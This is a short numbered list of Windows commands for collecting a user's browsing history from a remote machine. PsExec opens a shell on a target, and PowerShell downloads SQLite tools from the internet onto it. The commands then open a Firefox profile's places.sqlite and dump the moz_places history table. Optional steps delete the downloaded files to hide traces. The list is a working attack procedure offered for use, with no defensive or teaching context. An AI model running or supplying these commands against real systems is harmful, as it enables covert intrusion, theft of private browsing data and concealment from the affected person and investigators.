1.PsExec64.exe cmd \\TARGET
2.powershell -c "Invoke-WebRequest -Uri 'https://sqlite.org/2021/sqlite-tools-win32-x86-3350300.zip' -OutFile 'c:\sqlite3.zip'"
3.powershell -c "Expand-Archive -Force C:\sqlite3.zip C:\sqlite3"
4.dir C:\Users\USER_NAME\AppData\Roaming\Mozilla\Firefox\Profiles
5.C:\sqlite3\sqlite-tools-win32-x86-3350300\sqlite3.exe C:\Users\USER_NAME\AppData\Roaming\Mozilla\Firefox\Profiles\FOUNDED_PROFILE\places.sqlite
6.select * from moz_places;
7..quit;

Optional:

8.del /Q sqlite3.zip
9.rmdir /Q /S sqlite3
